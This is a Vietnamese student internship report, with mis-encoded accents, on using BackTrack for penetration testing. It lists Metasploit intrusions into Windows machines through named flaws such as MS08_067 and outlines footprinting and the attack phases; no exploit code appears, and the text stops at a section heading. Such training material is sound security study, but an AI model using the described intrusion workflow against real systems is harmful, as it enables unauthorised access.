bao cao thuc tap athena
TRANSCRIPT
i
TRUNG TAcircM ĐAgraveO TẠO QUẢN TRỊ MẠNG
VAgrave AN NINH MẠNG QUỐC TẾ
ATHENA
----------
BAacuteO CAacuteO THỰC TẬP TỐT NGHIỆP
ĐỀ TAgraveI
NGHIEcircN CỨU VAgrave HƯỚNG DẪN SỬ DỤNG CAacuteC CHỨC
NĂNG CỦA BACKTRACK ĐỂ KIỂM TRA AN NINH
MẠNG
Giảng viecircn hướng dẫn VOtilde ĐỖ THẮNG
Sinh viecircn thực hiện ĐAgraveO COcircNG TRUNG
TP Hồ Chiacute Minh 2014
ii
LỜI CẢM ƠN
Em xin caacutem ơn Quyacute Thầy Cocirc khoa Cao đẳng thực hagravenh trường Đại học Cocircng
nghệ TPHCM ndash HUTECH đatilde tạo điều kiện cho em được tham gia thực tập thực tế tại
caacutec cocircng ty
Em xin caacutem ơn Quyacute Thầy Cocirc đatilde nhiệt tigravenh giảng dạy giuacutep em coacute một lượng
kiến thức đầy đủ để coacute thể hoagraven thagravenh baacuteo caacuteo thực tập nagravey
Em xin caacutem ơn thầy Votilde Đỗ Thắng ndash Giaacutem đốc Trung tacircm đagraveo tạo quản trị mạng
vagrave an ninh mạng Athena đatilde hết lograveng hướng dẫn em trong quaacute trigravenh thực tập
Em xin caacutem ơn Thầy Nguyễn Ngọc Đại đatilde đồng yacute hướng dẫn giuacutep em hoagraven
thagravenh baacuteo caacuteo thực tập
Caacutem ơn tất cả caacutec bạn begrave thuộc tập thể lớp C12QM15 đatilde cugraveng nhau tham gia
học tập trong suốt 2 năm qua
Sinh viecircn thực hiện
ĐAgraveO COcircNG TRUNG
iii
CỘNG HOgraveA XAtilde HỘI CHỦ NGHĨA VIỆT NAM
Độc lập ndash Tự do ndash Hạnh phuacutec
NHẬN XEacuteT THỰC TẬP
Họ vagrave tecircn sinh viecircn ĐAgraveO COcircNG TRUNG
Matilde sinh viecircn 12203214
Khoaacute học 2012-2014
1 Thời gian thực tập
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
2 Bộ phận thực tập
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
3 Tinh thần traacutech nhiệm với cocircng việc vagrave yacute thức chấp hagravenh kỷ luật
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
4 Kết quả thực tập theo đề tagravei
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
5 Nhận xeacutet chung
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
Caacuten bộ hướng dẫn của cơ quan đến thực tập (Kyacute vagrave ghi rotilde họ tecircn)
Ngagravey thaacuteng năm
Thủ trưởng cơ quan (Kyacute tecircn vagrave đoacuteng dấu)
iv
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN
Ngagravey thaacuteng năm
GIAacuteO VIEcircN HƯỚNG DẪN (Kyacute vagrave ghi rotilde họ tecircn)
v
MỤC LỤC
LỜI CAacuteM ƠN ii
NHẬN XEacuteT THỰC TẬP iii
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN iv
LỜI MỞ ĐẦU vii
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN MẠNG 1
11 GIỚI THIỆU VỀ COcircNG TY 1
12 LỊCH SỬ HIgraveNH THAgraveNH 1
13 QUAacute TRIgraveNH PHAacuteT TRIỂN 2
14 CHỨC NĂNG VAgrave NHIỆM VỤ 3
15 CƠ CẤU TỔ CHỨC 3
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH 3
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP 4
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG 5
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN 5
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN 5
221 TỔNG QUAN VỀ BACKTRACK 5
2211 GIỚI THIỆU BACKTRACK 5
2212 LỊCH SỬ PHAacuteT TRIỂN 6
2213 MỤC ĐIacuteCH 6
222 FOOTPRINTING 7
223 CAacuteC KIỂU FOOTPRINTING 8
2231 PASSIVE FOOTPRINTING 8
2232 ACTIVE FOOTPRING 13
224 SCANING 13
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH 14
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING 14
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG 20
2251 LỖI MS08_067 20
2252 LỖI MS10_090 26
2253 LỖI MS12_004 34
2254 LỖI MS12_027 43
vi
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET 52
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ VPS 59
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS 65
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute 69
31 ƯU ĐIỂM 69
32 KHUYẾT ĐIỂM 69
33 KẾT LUẬN 69
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
